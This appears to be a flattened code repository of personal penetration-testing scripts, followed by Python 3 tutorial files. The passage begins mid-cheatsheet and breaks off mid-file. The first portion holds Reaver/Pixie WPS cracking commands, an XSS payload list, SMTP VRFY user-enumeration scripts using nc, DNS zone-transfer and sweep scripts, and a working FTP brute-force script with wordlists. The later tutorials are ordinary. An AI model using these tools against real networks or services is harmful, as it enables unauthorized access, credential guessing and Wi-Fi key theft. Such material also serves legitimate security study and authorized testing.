| iwconfig wlan1 txpower 30 65 | iwconfig wlan1 rate 11M auto 66 | 67 | 68 | Reaver 69 | ------ 70 | 71 | airmon-ng start wlan0 72 | airodump-ng wlan0 73 | reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv 74 | reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -S --no-nacks -d7 -vv -c 1 75 | 76 | 77 | Pixie WPS 78 | --------- 79 | 80 | airmon-ng check 81 | airmon-ng start wlan0 82 | airodump-ng wlan0mon --wps 83 | reaver -i wlan0mon -c 11 -b 00:00:00:00:00:00 -K 1 84 | 85 | 86 | Wireless Notes 87 | -------------- 88 | 89 | Wired Equivalent Privacy (WEP) 90 | RC4 stream cipher w/ CRC32 for integrity check 91 | - Attack: 92 | By sniffing an ARP packet, then replaying it to get many encrypted replies with different IVs. 93 | - Remediation: 94 | Use WPA2 95 | 96 | Wifi Protected Access (WPA) 97 | Temporal Key Integrity Protocol (TKIP) Message Integrity Check 98 | - Attack: 99 | Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station. 100 | - Remediation: 101 | Use long-keys 102 | 103 | Wifi Protected Access 2 (WPA2) 104 | Advanced Encryption Standard (AES) 105 | - Attack: 106 | Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station. 107 | - Remediation: 108 | WPA-Enterprise 109 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_XSS.txt: -------------------------------------------------------------------------------- 1 | ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; 2 | alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- 3 | >">'> 4 | 5 | 6 | 7 | 8 | xxs link 9 | xxs link 10 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_scp.txt: -------------------------------------------------------------------------------- 1 | [+] Secure Copy (scp) Cheatsheet 2 | -------------------------------- 3 | 4 | [>] Copy remote file to local host: 5 | 6 | $ scp your_username@192.168.0.10: /some/local/directory 7 | 8 | [>] Copy local file to remote host: 9 | 10 | $ scp your_username@192.168.0.10:/some/remote/directory 11 | 12 | [>] Copy local directory to remote directory: 13 | 14 | scp -r your_username@192.168.0.10:/some/remote/directory/ 15 | 16 | [>] Copy a file from one remote host to another: 17 | 18 | scp your_username@:/some/remote/directory/foobar.txt your_username@:/some/remote/directory/ 19 | 20 | [>] Improve scp performance (use blowfish): 21 | 22 | scp -c blowfish your_username@192.168.0.10:/some/remote/directory -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/README.md: -------------------------------------------------------------------------------- 1 | Cheatsheets 2 | =========== 3 | 4 | Penetration Testing/Security Cheatsheets that I have collated over the years. 5 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Pentest_Tools/DNS_lookup.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [ -z "$1" ]; then 4 | echo "" 5 | echo "[*] Please enter a valid file" 6 | echo "" 7 | exit 0 8 | fi 9 | 10 | echo "" 11 | echo "[*] These addresses were found based on $1" 12 | echo "" 13 | 14 | for IP in $(cat $1);do 15 | 16 | host $IP | grep "domain name" | cut -d " " -f5 > temp.txt 17 | info=`cat temp.txt` 18 | echo "$IP" " " "$info" 19 | rm temp.txt 20 | done 21 | 22 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Pentest_Tools/SMTP_VRFY.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [ -z "$2" ]; then 4 | echo "" 5 | echo "[*] Please enter a valid URL" 6 | echo "" 7 | exit 0 8 | fi 9 | 10 | 11 | 12 | for user in $(cat $2);do 13 | echo VRFY $user | nc -nv -w 1 $1 25 2>/dev/null|grep ^"250" 14 | done 15 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Pentest_Tools/dns_zone_transfer.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [ -z "$1" ]; then 4 | echo "" 5 | echo "[*] Please enter a valid URL" 6 | echo "" 7 | exit 0 8 | fi 9 | 10 | echo "" 11 | echo "[*] The following addresses were found" 12 | echo "" 13 | 14 | for server in $(host -t ns $1|cut -d" " -f4);do 15 | host -l $1 $server |grep "has address" | cut -d " " -f1,4; 16 | 17 | done 18 | 19 | 20 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Pentest_Tools/forward_DNS.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [ -z "$1" ]; then 4 | echo "" 5 | echo "[*] Please enter a valid URL" 6 | echo "" 7 | exit 0 8 | fi 9 | 10 | echo "" 11 | echo "[*] These addresses were found based on list.txt" 12 | echo "" 13 | 14 | for name in $(cat list.txt);do 15 | host $name.$1 | grep "has address" | cut -d" " -f1,4 | sort -u 16 | done 17 | 18 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Pentest_Tools/list.txt: -------------------------------------------------------------------------------- 1 | www 2 | ftp 3 | mail 4 | admin 5 | router 6 | www2 7 | firewall 8 | mx 9 | pop3 10 | smtp 11 | root 12 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Pentest_Tools/nmap_spam.sh: -------------------------------------------------------------------------------- 1 | #/bin/bash 2 | 3 | 4 | if (-z $1); then 5 | echo "" 6 | echo "[*] Please enter a base ip" 7 | echo "" 8 | exit 0 9 | fi 10 | echo "" 11 | echo "[*] Scan Results" 12 | echo "" 13 | 14 | for ip in $(seq 0 254);do 15 | nmap -sS $1.$ip -o Nmap/output$ip.txt & 16 | done 17 | 18 | nmap -sT $1.255 19 | 20 | for ip in $(seq 0 254);do 21 | cat Nmap/output$ip.txt >> output.txt 22 | rm Nmap/output$ip.txt 23 | done 24 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Pentest_Tools/ping_sweep.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [ -z "$1" ]; then 4 | echo "" 5 | echo "[*] Please enter a valid base IP" 6 | echo "" 7 | exit 0 8 | fi 9 | 10 | echo "" 11 | echo "[*] Listing live IPs" 12 | echo "" 13 | 14 | for ip in $(seq 0 254); do 15 | ping -c 1 $1.$ip | grep "bytes from" | cut -d " " -f4 | cut -d ":" -f1 >> sweep.txt& 16 | 17 | done 18 | 19 | # Printing from text file for clean output 20 | cat sweep.txt 21 | rm sweep.txt 22 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Pentest_Tools/reverse_DNS.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [ -z "$4" ]; then 4 | echo "" 5 | echo "[*] Please enter a valid input" 6 | echo "[*] Correct format: 'IP base' 'Domain' 'Range Start' 'Range End'" 7 | echo "[*] Example: 127.0.0 google 1 255" 8 | echo "" 9 | exit 0 10 | fi 11 | 12 | echo "" 13 | echo "[*] Listing found addresses" 14 | echo "" 15 | 16 | for ip in $(seq $3 $4);do 17 | host $1.$ip | grep $2 | cut -d" " -f1,5 18 | done 19 | 20 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Pentest_Tools/vrfy.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | 6 | if len(sys.argv) != 3: 7 | print "[*] Usage: vrfy.py " 8 | sys.exit(0) 9 | 10 | else: 11 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 12 | connect = s.connect((sys.argv[1], 25)) #connets to socket 13 | banner = s.recv(1024) 14 | print banner #prints banner 15 | f1 = open('./'+ sys.argv[2], 'r')#reads input file 16 | f2 = open('./user_results.txt', 'w+') #opens files for writing 17 | 18 | for ln in iter(f1.readline, ''): #runs the VRFY chack and outputs it to a file 19 | s.send('VRFY ' + ln +'\r\n') 20 | result = s.recv(1024) 21 | f2.writelines(result) 22 | print result 23 | 24 | s.close() 25 | 26 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/ftp_brute_force/ftp_brute_force.py: -------------------------------------------------------------------------------- 1 | __author__ = "Santhosh Baswa" 2 | __copyright__ = "Copyright 2016, Independent Security Researcher" 3 | 4 | import ftplib 5 | import sys 6 | 7 | def brute(ip,users_file,passwords_file): 8 | try: 9 | ud=open(users_file,"r") 10 | pd=open(passwords_file,"r") 11 | 12 | users= ud.readlines() 13 | passwords=pd.readlines() 14 | 15 | for user in users: 16 | for password in passwords: 17 | try: 18 | print "[*] Trying to connect" 19 | connect=ftplib.FTP(ip) 20 | response=connect.login(user,password) 21 | print response 22 | if "230 Login" in response: 23 | print "[*]Sucessful attack" 24 | print "User: "+ user + "Password: "+password 25 | sys.exit() 26 | else: 27 | pass 28 | except ftplib.error_perm: 29 | print "Cant Brute Force with user "+user+ "and password "+password 30 | connect.close 31 | 32 | except(KeyboardInterrupt): 33 | print "Interrupted!" 34 | sys.exit() 35 | 36 | ip=raw_input("Introduce IP:") 37 | user_file="users.txt" 38 | passwords_file="passwords.txt" 39 | brute(ip,user_file,passwords_file) 40 | 41 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/ftp_brute_force/passwords.txt: -------------------------------------------------------------------------------- 1 | admin 2 | usuario 3 | user -------------------------------------------------------------------------------- /Penentration Testing_Scripts/ftp_brute_force/requirements.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/ftp_brute_force/users.txt: -------------------------------------------------------------------------------- 1 | usuario 2 | admin 3 | user 4 | -------------------------------------------------------------------------------- /Python_3_Tutorials/02 Quick Start/conditionals.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | a, b = 0, 1 5 | if a < b: 6 | print('a ({}) is less than b ({})'.format(a, b)) 7 | else: 8 | print('a ({}) is not less than b ({})'.format(a, b)) 9 | -------------------------------------------------------------------------------- /Python_3_Tutorials/02 Quick Start/exceptions.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | fh = open('xlines.txt') 5 | for line in fh.readlines(): 6 | print(line) 7 | 8 | -------------------------------------------------------------------------------- /Python_3_Tutorials/02 Quick Start/forloop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | # read the lines from the file 4 | fh = open('lines.txt') 5 | for line in fh.readlines(): 6 | print(line) 7 | -------------------------------------------------------------------------------- /Python_3_Tutorials/02 Quick Start/function.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def isprime(n): 5 | if n == 1: 6 | print("1 is special") 7 | return False 8 | for x in range(2, n): 9 | if n % x == 0: 10 | print("{} equals {} x {}".format(n, x, n // x)) 11 | return False 12 | else: 13 | print(n, "is a prime number") 14 | return True 15 | 16 | for n in range(1, 20): 17 | isprime(n) 18 | 19 | -------------------------------------------------------------------------------- /Python_3_Tutorials/02 Quick Start/generator.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | def isprime(n): 4 | if n == 1: 5 | return False 6 | for x in range(2, n): 7 | if n % x == 0: 8 | return False 9 | else: 10 | return True 11 | 12 | def primes(n = 1): 13 | while(True): 14 | if isprime(n): yield n 15 | n += 1 16 | 17 | for n in primes(): 18 | if n > 100: break 19 | print(n) 20 | 21 | -------------------------------------------------------------------------------- /Python_3_Tutorials/02 Quick Start/hello.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | print("Hello, World!") 4 | -------------------------------------------------------------------------------- /Python_3_Tutorials/02 Quick Start/lines.txt: -------------------------------------------------------------------------------- 1 | 01 This is a line of text 2 | 02 This is a line of text 3 | 03 This is a line of text 4 | 04 This is a line of text 5 | 05 This is a line of text 6 | -------------------------------------------------------------------------------- /Python_3_Tutorials/02 Quick Start/oop2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | class AnimalActions: 4 | def quack(self): return self.strings['quack'] 5 | def feathers(self): return self.strings['feathers'] 6 | def bark(self): return self.strings['bark'] 7 | def fur(self): return self.strings['fur'] 8 | 9 | class Duck(AnimalActions): 10 | strings = dict( 11 | quack = "Quaaaaak!", 12 | feathers = "The duck has gray and white feathers.", 13 | bark = "The duck cannot bark.", 14 | fur = "The duck has no fur." 15 | ) 16 | 17 | class Person(AnimalActions): 18 | strings = dict( 19 | quack = "The person imitates a duck.", 20 | feathers = "The person takes a feather from the ground and shows it.", 21 | bark = "The person says woof!", 22 | fur = "The person puts on a fur coat." 23 | ) 24 | 25 | class Dog(AnimalActions): 26 | strings = dict( 27 | quack = "The dog cannot quack.", 28 | feathers = "The dog has no feathers.", 29 | bark = "Arf!", 30 | fur = "The dog has white fur with black spots." 31 | ) 32 | 33 | def in_the_doghouse(dog): 34 | print(dog.bark()) 35 | print(dog.fur()) 36 | 37 | def in_the_forest(duck): 38 | print(duck.quack()) 39 | print(duck.feathers()) 40 | 41 | def main(): 42 | donald = Duck() 43 | john = Person() 44 | fido = Dog() 45 | 46 | print("- In the forest:") 47 | for o in ( donald, john, fido ): 48 | in_the_forest(o) 49 | 50 | print("- In the doghouse:") 51 | for o in ( donald, john, fido ): 52 | in_the_doghouse(o) 53 | 54 | if __name__ == "__main__": main() 55 | -------------------------------------------------------------------------------- /Python_3_Tutorials/02 Quick Start/oop3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | # -- VIEW -- 4 | 5 | class AnimalActions: 6 | def bark(self): return self._doAction('bark') 7 | def fur(self): return self._doAction('fur') 8 | def quack(self): return self._doAction('quack') 9 | def feathers(self): return self._doAction('feathers') 10 | 11 | def _doAction(self, action): 12 | if action in self.strings: 13 | return self.strings[action] 14 | else: 15 | return 'The {} has no {}'.format(self.animalName(), action) 16 | 17 | def animalName(self): 18 | return self.__class__.__name__.lower() 19 | 20 | # -- MODEL -- 21 | 22 | class Duck(AnimalActions): 23 | strings = dict( 24 | quack = "Quaaaaak!", 25 | feathers = "The duck has gray and white feathers." 26 | ) 27 | 28 | class Person(AnimalActions): 29 | strings = dict( 30 | bark = "The person says woof!", 31 | fur = "The person puts on a fur coat.", 32 | quack = "The person imitates a duck.", 33 | feathers = "The person takes a feather from the ground and shows it." 34 | ) 35 | 36 | class Dog(AnimalActions): 37 | strings = dict( 38 | bark = "Arf!", 39 | fur = "The dog has white fur with black spots.", 40 | ) 41 | 42 | # -- CONTROLLER -- 43 | 44 | def in_the_doghouse(dog): 45 | print(dog.bark()) 46 | print(dog.fur()) 47 | 48 | def in_the_forest(duck): 49 | print(duck.quack()) 50 | print(duck.feathers()) 51 | 52 | def main(): 53 | donald = Duck() 54 | john = Person() 55 | fido = Dog() 56 | 57 | print("-- In the forest:") 58 | for o in ( donald, john, fido ): 59 | in_the_forest(o) 60 | 61 | print("-- In the doghouse:") 62 | for o in ( donald, john, fido ): 63 | in_the_doghouse(o) 64 | 65 | if __name__ == "__main__": main() 66 | -------------------------------------------------------------------------------- /Python_3_Tutorials/02 Quick Start/simpleoop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | # simple fibonacci series 4 | # the sum of two elements defines the next set 5 | class Fibonacci(): 6 | def __init__(self, a, b): 7 | self.a = a 8 | self.b = b 9 | 10 | def series(self): 11 | while(True): 12 | yield(self.b) 13 | self.a, self.b = self.b, self.a + self.b 14 | 15 | f = Fibonacci(0, 1) 16 | for r in f.series(): 17 | if r > 100: break 18 | print(r, end=' ') 19 | 20 | -------------------------------------------------------------------------------- /Python_3_Tutorials/02 Quick Start/whileloop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | # simple fibonacci series 4 | # the sum of two elements defines the next set 5 | a, b = 0, 1 6 | while b < 50: 7 | print(b) 8 | a, b = b, a + b 9 | -------------------------------------------------------------------------------- /Python_3_Tutorials/04 Syntax/comments.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | for n in primes(): 6 | if n > 100: break 7 | print(n) 8 | 9 | def isprime(n): 10 | if n == 1: 11 | return False 12 | for x in range(2, n): 13 | if n % x == 0: 14 | return False 15 | else: 16 | return True 17 | 18 | def primes(n = 1): 19 | while(True): 20 | if isprime(n): yield n 21 | n += 1 22 | 23 | if __name__ == "__main__": main() 24 | -------------------------------------------------------------------------------- /Python_3_Tutorials/04 Syntax/syntax.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | print("This is the syntax.py file.") 6 | 7 | if __name__ == "__main__": main() 8 | -------------------------------------------------------------------------------- /Python_3_Tutorials/05 Variables/variables.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | print("This is the variables.py file.") 6 | 7 | if __name__ == "__main__": main() 8 | -------------------------------------------------------------------------------- /Python_3_Tutorials/06 Conditionals/conditionals.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | print("This is the conditionals.py file.") 6 | 7 | if __name__ == "__main__": main() 8 | -------------------------------------------------------------------------------- /Python_3_Tutorials/06 Conditionals/jumptable.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | class jumptable(): 5 | jumptable = {} 6 | 7 | def set(self, k, v): 8 | self.jumptable[k] = v 9 | 10 | def go(self, index): 11 | if index in self.jumptable: 12 | self.jumptable[index]() 13 | elif 'default' in self.jumptable: 14 | self.jumptable['default']() 15 | else: 16 | raise RuntimeError('undefined jump: {}'.format(index)) 17 | 18 | def main(): 19 | j = jumptable(); 20 | j.set('one', one) 21 | j.set('two', two) 22 | j.set('three', three) 23 | j.set('default', default) 24 | 25 | try: 26 | j.go('seven') 27 | except RuntimeError as e: 28 | print(e) 29 | 30 | def one(): 31 | print('This is the "one" function.') 32 | 33 | def two(): 34 | print('This is the "two" function.') 35 | 36 | def three(): 37 | print('This is the "three" function.') 38 | 39 | def default(): 40 | print('this is the default function.') 41 | 42 | if __name__ == "__main__": main() 43 | -------------------------------------------------------------------------------- /Python_3_Tutorials/06 Conditionals/switch.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | print('this is the switch.py file') 6 | 7 | if __name__ == "__main__": main() 8 | -------------------------------------------------------------------------------- /Python_3_Tutorials/07 Loops/for.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | fh = open('lines.txt') 6 | for line in fh.readlines(): 7 | print(line) 8 | 9 | if __name__ == "__main__": main() 10 | -------------------------------------------------------------------------------- /Python_3_Tutorials/07 Loops/iterators.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | fh = open('lines.txt') 6 | for line in fh.readlines(): 7 | print(line) 8 | 9 | if __name__ == "__main__": main() 10 | -------------------------------------------------------------------------------- /Python_3_Tutorials/07 Loops/lines.txt: -------------------------------------------------------------------------------- 1 | 01 This is a line of text 2 | 02 This is a line of text 3 | 03 This is a line of text 4 | 04 This is a line of text 5 | 05 This is a line of text 6 | -------------------------------------------------------------------------------- /Python_3_Tutorials/07 Loops/loopcontrol.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | s = 'this is a string' 6 | for c in s: 7 | print(c, end='') 8 | 9 | if __name__ == "__main__": main() 10 | -------------------------------------------------------------------------------- /Python_3_Tutorials/07 Loops/while.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | # simple fibonacci series 6 | # the sum of two elements defines the next set 7 | a, b = 0, 1 8 | while b < 50: 9 | print(b, end=' ') 10 | a, b = b, a + b 11 | 12 | if __name__ == "__main__": main() 13 | -------------------------------------------------------------------------------- /Python_3_Tutorials/08 Operators/ops.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | print("This is the ops.py file.") 6 | 7 | if __name__ == "__main__": main() 8 | -------------------------------------------------------------------------------- /Python_3_Tutorials/09 Regexes/regex.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | import re 5 | 6 | def main(): 7 | fh = open('raven.txt') 8 | for line in fh: 9 | if re.search('(Len|Neverm)ore', line): 10 | print(line, end='') 11 | 12 | if __name__ == "__main__": main() 13 | -------------------------------------------------------------------------------- /Python_3_Tutorials/10 Exceptions/exceptions.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | fh = open('lines.txt') 6 | for line in fh: print(line.strip()) 7 | 8 | if __name__ == "__main__": main() 9 | -------------------------------------------------------------------------------- /Python_3_Tutorials/10 Exceptions/lines.txt: -------------------------------------------------------------------------------- 1 | 01 This is a line of text 2 | 02 This is a line of text 3 | 03 This is a line of text 4 | 04 This is a line of text 5 | 05 This is a line of text 6 | -------------------------------------------------------------------------------- /Python_3_Tutorials/11 Functions/functions.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | testfunc() 6 | 7 | def testfunc(): 8 | print('This is a test function') 9 | 10 | if __name__ == "__main__": main() 11 | -------------------------------------------------------------------------------- /Python_3_Tutorials/11 Functions/generator.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | print("This is the functions.py file.") 6 | for i in range(25): 7 | print(i, end = ' ') 8 | 9 | if __name__ == "__main__": main() 10 | -------------------------------------------------------------------------------- /Python_3_Tutorials/12 Classes/classes.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | class Duck: 5 | def quack(self): 6 | print('Quaaack!') 7 | 8 | def walk(self): 9 | print('Walks like a duck.') 10 | 11 | def main(): 12 | donald = Duck() 13 | donald.quack() 14 | donald.walk() 15 | 16 | if __name__ == "__main__": main() 17 | -------------------------------------------------------------------------------- /Python_3_Tutorials/12 Classes/decorators.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | class Duck: 5 | def __init__(self, **kwargs): 6 | self.properties = kwargs 7 | 8 | def quack(self): 9 | print('Quaaack!') 10 | 11 | def walk(self): 12 | print('Walks like a duck.') 13 | 14 | def get_properties(self): 15 | return self.properties 16 | 17 | def get_property(self, key): 18 | return self.properties.get(key, None) 19 | 20 | def main(): 21 | donald = Duck(color = 'blue') 22 | print(donald.get_property('color')) 23 | 24 | if __name__ == "__main__": main() 25 | -------------------------------------------------------------------------------- /Python_3_Tutorials/12 Classes/generator.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | o = range(25) 6 | for i in o: print(i, end = ' ') 7 | 8 | if __name__ == "__main__": main() 9 | -------------------------------------------------------------------------------- /Python_3_Tutorials/13 Strings/lines.txt: -------------------------------------------------------------------------------- 1 | 01 This is a line of text 2 | 02 This is a line of text 3 | 03 This is a line of text 4 | 04 This is a line of text 5 | 05 This is a line of text 6 | -------------------------------------------------------------------------------- /Python_3_Tutorials/13 Strings/strings.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | s = 'this is a string' 6 | print(s.capitalize()) 7 | print(s.title()) 8 | print(s.upper()) 9 | print(s.swapcase()) 10 | print(s.find('is')) 11 | print(s.replace('this', 'that')) 12 | print(s.strip()) 13 | print(s.isalnum()) 14 | print(s.isalpha()) 15 | print(s.isdigit()) 16 | print(s.isprintable()) 17 | 18 | if __name__ == "__main__": main() 19 | -------------------------------------------------------------------------------- /Python_3_Tutorials/14 Containers/containers.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | print('This is the containers.py file.') 6 | 7 | if __name__ == "__main__": main() 8 | -------------------------------------------------------------------------------- /Python_3_Tutorials/14 Containers/utf8.txt: -------------------------------------------------------------------------------- 1 | This is a UTF-8 file. 2 | It has some interesting characters in it. 3 | ٩(͡๏̯͡๏)۶ 4 | -------------------------------------------------------------------------------- /Python_3_Tutorials/15 Files/files.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | f = open('lines.txt') 6 | for line in f: 7 | print(line, end = '') 8 | 9 | if __name__ == "__main__": main() 10 | -------------------------------------------------------------------------------- /Python_3_Tutorials/15 Files/lines.txt: -------------------------------------------------------------------------------- 1 | 01 This is a line of text 2 | 02 This is a line of text 3 | 03 This is a line of text 4 | 04 This is a line of text 5 | 05 This is a line of text 6 | -------------------------------------------------------------------------------- /Python_3_Tutorials/15 Files/olives.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/Python_3_Tutorials/15 Files/olives.jpg -------------------------------------------------------------------------------- /Python_3_Tutorials/16 Databases/databases.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | import sqlite3 5 | 6 | def main(): 7 | print('This is the databases.py file') 8 | 9 | if __name__ == "__main__": main() 10 | -------------------------------------------------------------------------------- /Python_3_Tutorials/16 Databases/sqlite3-class.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | import sqlite3 5 | 6 | class database: 7 | def __init__(self, **kwargs): 8 | self.filename = kwargs.get('filename') 9 | self.table = kwargs.get('table', 'test') 10 | 11 | def sql_do(self, sql, *params): 12 | self._db.execute(sql, params) 13 | self._db.commit() 14 | 15 | def insert(self, row): 16 | self._db.execute('insert into {} (t1, i1) values (?, ?)'.format(self._table), (row['t1'], row['i1'])) 17 | self._db.commit() 18 | 19 | def retrieve(self, key): 20 | cursor = self._db.execute('select * from {} where t1 = ?'.format(self._table), (key,)) 21 | return dict(cursor.fetchone()) 22 | 23 | def update(self, row): 24 | self._db.execute( 25 | 'update {} set i1 = ? where t1 = ?'.format(self._table), 26 | (row['i1'], row['t1'])) 27 | self._db.commit() 28 | 29 | def delete(self, key): 30 | self._db.execute('delete from {} where t1 = ?'.format(self._table), (key,)) 31 | self._db.commit() 32 | 33 | def disp_rows(self): 34 | cursor = self._db.execute('select * from {} order by t1'.format(self._table)) 35 | for row in cursor: 36 | print(' {}: {}'.format(row['t1'], row['i1'])) 37 | 38 | def __iter__(self): 39 | cursor = self._db.execute('select * from {} order by t1'.format(self._table)) 40 | for row in cursor: 41 | yield dict(row) 42 | 43 | @property 44 | def filename(self): return self._filename 45 | 46 | @filename.setter 47 | def filename(self, fn): 48 | self._filename = fn 49 | self._db = sqlite3.connect(fn) 50 | self._db.row_factory = sqlite3.Row 51 | 52 | @filename.deleter 53 | def filename(self): self.close() 54 | 55 | @property 56 | def table(self): return self._table 57 | @table.setter 58 | def table(self, t): self._table = t 59 | @table.deleter 60 | def table(self): self._table = 'test' 61 | 62 | def close(self): 63 | self._db.close() 64 | del self._filename 65 | 66 | def main(): 67 | db = database(filename = 'test.db', table = 'test') 68 | 69 | print('Create table test') 70 | db.sql_do('drop table if exists test') 71 | db.sql_do('create table test ( t1 text, i1 int )') 72 | 73 | print('Create rows') 74 | db.insert(dict(t1 = 'one', i1 = 1)) 75 | db.insert(dict(t1 = 'two', i1 = 2)) 76 | db.insert(dict(t1 = 'three', i1 = 3)) 77 | db.insert(dict(t1 = 'four', i1 = 4)) 78 | for row in db: print(row) 79 | 80 | print('Retrieve rows') 81 | print(db.retrieve('one'), db.retrieve('two')) 82 | 83 | print('Update rows') 84 | db.update(dict(t1 = 'one', i1 = 101)) 85 | db.update(dict(t1 = 'three', i1 = 103)) 86 | for row in db: print(row) 87 | 88 | print('Delete rows') 89 | db.delete('one') 90 | db.delete('three') 91 | for row in db: print(row) 92 | 93 | if __name__ == "__main__": main() 94 | -------------------------------------------------------------------------------- /Python_3_Tutorials/16 Databases/sqlite3-crud.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | import sqlite3 5 | 6 | def insert(db, row): 7 | db.execute('insert into test (t1, i1) values (?, ?)', (row['t1'], row['i1'])) 8 | db.commit() 9 | 10 | def retrieve(db, t1): 11 | cursor = db.execute('select * from test where t1 = ?', (t1,)) 12 | return cursor.fetchone() 13 | 14 | def update(db, row): 15 | db.execute('update test set i1 = ? where t1 = ?', (row['i1'], row['t1'])) 16 | db.commit() 17 | 18 | def delete(db, t1): 19 | db.execute('delete from test where t1 = ?', (t1,)) 20 | db.commit() 21 | 22 | def disp_rows(db): 23 | cursor = db.execute('select * from test order by t1') 24 | for row in cursor: 25 | print(' {}: {}'.format(row['t1'], row['i1'])) 26 | 27 | def main(): 28 | db = sqlite3.connect('test.db') 29 | db.row_factory = 